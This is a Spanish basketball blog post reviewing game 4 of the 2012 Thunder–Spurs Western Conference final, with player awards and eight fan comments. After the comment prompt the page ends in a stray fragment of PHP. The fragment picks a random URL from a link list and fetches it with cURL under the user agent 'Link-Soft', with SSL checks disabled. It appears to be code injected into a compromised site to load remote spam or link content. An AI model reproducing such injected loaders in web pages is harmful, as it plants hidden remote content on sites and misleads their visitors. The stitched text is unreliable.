La Crónica: Fuerzas de la naturaleza

03 de June de 2012 por TheDeerHunter

¡Qué maravilla de finales de conferencia que estamos viviendo! ¿Es la del Oeste la final anticipada? Lo desconozco, pero si fuera por mí la ponía al mejor de 27. Que no se acabe nunca.

Por si alguien no lo sabe los Thunder han logrado colocar el 2-2. Estos próximos choques pueden ser una auténtica locura.

Un día en el que Parker y Westbrook se neutralizaban mutuamente a base de entrega defensiva de ambos, Harden y Ginobili también se mostraban simultáneamente más apagados que de costumbre. Los Thunder colapsados en transición como no lo han estado nunca estos playoffs. En medio de una auténtica partida de ajedrez de Popovich y Brooks sólo las proezas más insólitas pueden romper las tablas.

A la sólida actuación de la gran leyenda de los Power Forwards Tim Duncan se le opuso el partido de su vida de Serge Ibaka. Se quedó a una sola canasta del mayor número de lanzamientos sin fallo en toda la historia de los playoffs. Inmaculado 11 de 11 siendo 6 de ellos lanzamientos relativamente lejanos. Por dentro Perkins y Nick Collison también contribuyeron en ataque como no están habituados y por aquí San Antonio comenzó a perder el punto. Estuvo bien Diaw, pero no así Splitter. Popovich está volviendo a contar a la desesperada con Blair y está respondiendo en parte.

Sin embargo no fue suficiente este factor para romper la igualdad. Fue la mejor segunda parte de la carrera de Durant, que se dice pronto. 28 de sus 36 puntos en los últimos cuartos con un 11 de 16 de acierto metiéndolas literalmente de todos los colores, sabores y olores. Directo a los anales de la liga. Os diré que esto será la final anticipada y todo lo que queramos, pero un duelo Durant-LeBron en una final puede ser algo así como un Magic-Bird salvando las distancias. Lo máximo de lo máximo.

PREMIOS

MVP: Kevin Durant brilla entre lo más brillante. Segunda parte antológica para un total de 36 puntos, 8 asistencias, 6 rebotes y un tapón. Se aplica la máxima de “hago lo que quiero, cuando quiero y como me da la gana”.

Rookie: Gran actuación de Kawhi Leonard con 17 puntos (un único fallo) y 9 rebotes, sin embargo no hay hombre nacido de mujer que ahora mismo pueda parar a Durantula.

Sorpresa: El partido inmaculado de Serge Ibaka tiene tela, pero también hay que anotar la fecha que Kendrick Perkins hizo un 7 de 9 en un partido como éste.

Decepción: Podríamos señalar el 7 de 25 entre Westbrook y Parker, pero se dejaron la vida defendiéndose mutuamente. Diría que en una serie a este nivel es complicado encontrar decepciones. Si acaso Tiago Splitter.

Esfuerzo en vano: No está Tim Duncan en edad de desaprovechar actuaciones de 21 ptos, 8 rebotes, 2 asistencias y 1 tapón en 36 minutos de esfuerzo.

Comenta

8 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Pues se pone la eliminatoria al rojo vivo. Entre Super Durantula y Hakeem Ibaka ponen el empate y devuelven el golpe de los primeros dos partidos en El Alamo. Partidazo de los buenos el de esta noche en Oklahoma.
    Los Spurs empezaron recordando al equipo del final del primer partido y el inicio del segundo. Gran circulación de balón, un inspirado Diaw acompañando a Duncan y bu88enos tiros siempre ante una defensa Thunder que llegaba tarde en la mayoría de las ocasiones. Así las cosas OKC tampoco perdía el paso con un Durántula que aún sin meter puntos atraía toda la defensa jugando de manera muy inteligente junto a Westbrook lo que provocó que Perkins (sí sí Perkins) primero y luego Ibaka y Collison empezaran a anotar.
    Este es un factor desconocido con el que no contaba Popovich. La defensa de San Antonio se pegó mucho a Durant, Westbrook y Harden pero si en el 3º fue Sefolosha el que les hizo un traje esta vez fueron todos los interiores los que aprovecharon para machacar a la defensa de los Spurs.
    Además el principio del despegue vino de la mano de la segunda unidad de los Thunder. Como pasara el otro día sin Perkins en cancha los super-fisicos Thunder se empezaron a anticipar a muchas de las jugadas y a sacar contraataques. Sin embargo, esta vez los Spurs no iban a dejarse ir tan fácil como en el partido anterior.
    De la mano de un Duncan más acertado y de buenos minutos de Leonard, Manudo y Stephen Jackson se mantuvieron siempre cerca y al inicio del último cuarto dejaron el partido casi empatado.
    Hasta ese momento habíamos vivido el día de Ibaka, sensacional en ataque con 11/11 tiros muchos de ellos abierto aprovechando la vigilancia sobre los demás. Pero llegados a este último cuarto Durantula tomó el mando de las operaciones y vivimos una de las grandes exhibiciones que se hallan visto en este deporte.
    De todos los colores en todas las posiciones y con todas las defensas, KD machacó una y otra vez a la defensa de los de Texas con tiros de todas las formas y colores ante la desesperación de Popovich. 18 puntos en el último cuarto sabiendo cuando dar balones a Harden o a los pivots para que ellos también metieran. Impresionante, sin duda él es la razón por la que yo aposté por los Thunder en esta eliminatoria.
    Ahora vuelta a San Antonio para un interesantísimo 5º partido. Si Westbrook y Parker se anulan de nuevo creo que es una buena noticia para OKC. ¿Seguirá Durantula a este nivel? ¿Reaccionarán los Spurs? Esta serie amenaza con pasar a la historia y es una de las más bonitas que he visto en lo últimos años.

      Citar

  2. Sancho88 dice:
    #2

    Deer, no estoy de acuerdo con lo de las no ventajas en transición de los Thunder, al menos en la primera parte. La segunda fue igualada, 5 contra 5 y Durant contra todos, pero en la primera sí que corrieron los Thunder, lo que pasa es que no las metían los habituales. En vez de ir a la guerra como en otros partidos Harden y Westbrook, ayer sacaban la pelota al poste alto para tiros cómodos de Perkins,Ibaka y Collison, o doblaban dentro para mates o bandejas de también de los interiores. Esto fue una variante táctica ofensiva que Popo no se esperaba. Estrategia contundente de Brooks, que poco a poco a mí me va ganando. En el primer partido pensaba que era un patán por sentar a Ibaka, en el segundo le fui viendo reacciones a la defensa de Parker, en el tercero aprovechó el físico de su equipo y en este aprovechó a sus interiores. Durísima batalla en los banquillos como comentas, y estamos ante una miniserie a tres partidos en la que todo apunta a que veremos un séptimo. Creo que jamás he visto unas finales de conferencia tan disputadas y de tanto nivel por parte de ambos equipos. No sé, de momento hay un empate técnico. Los dos equipos han hecho lo que tenían que hacer tanto en las victorias como en las derrotas. A pesar del tercero de Spurs, ayer si se vio ánimo por querer remontar, como en el primero de la serie, pero Durant lo impidió.

    Me está impresionando muchísimo Leonard por su templanza y conocimiento del juego a pesar de sus 20 años. Este tío de donde ha salido, de Duke o algún sitio por el estilo? xd

      Citar

  3. Sancho88 dice:
    #3

    http://www.marca.com/blogs/fuera-de-juego/2012/06/03/que-prometedor-jugador-de-la-nba-acaba.html

    JIMMEEEEEEEEEEEEEEEEEEEEEEEEEER!!!!!!!! FOR THREE!! YESSSSSSSSSSSSSS!!

      Citar

  4. Sancho88 dice:
    #4

    Coño, perdón por el offtopic, pero es que es imprescindible ver la cara de recien follao de este chaval. Que ojines de felicidad. A ver si empieza a meter alguna en la cancha para variar…

      Citar

  5. melo15 dice:
    #5

    Si porque pedazo temporada Rookie se ha marcado el chaval, tiene gran parte de la culpa de la mala temporada de los Kings, a mi la eleccion me parecia cuanto menos logica, juntamos a un slasher y un buen director como Evan con un base tirador como Fredette, pero este ha jugado fatal, tendrian que haber escogido a Knight o a Kemba.

      Citar

  6. TheDeerHunter dice:
    #6

    No tenemos que estar en todo de acuerdo Sancho, pero hay algunas cuestiones más opinables que otras.

    Los Thunder anotaron 9 puntos en transición durante todo el choque. Puedes revisar tú mismo el daño que acostumbran a hacer por esa vía.

      Citar

  7. GreenPride dice:
    #7

    Y los Celtics lo consiguieron…. eliminatoria empatada tras un partido soberbio en los 2 primeros cuartos y sufriendo y tirando de orgullo en el resto. Grande Rondo que llamó llorones a los Heat en el descanso, intentó patear a Battier tras una entrada y anotó los puntos decisivos otra vez, genio y figura. Toda la presión de nuevo en los hombros de LeBron y cia. para el 5º. Ahora seguimos en su post

      Citar

  8. nba dice:
    #8

    Sancho88:
    Coño, perdón por el offtopic, pero es que es imprescindible ver la cara de recien follao de este chaval. Que ojines de felicidad. A ver si empieza a meter alguna en la cancha para variar…

    Pues yo pense que habias puesto el link a la noticia del nuevo caballo que se ha comprado Pau ;-PPP,
    es que el Marca se empieza a parecer cada vez mas al Hola

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>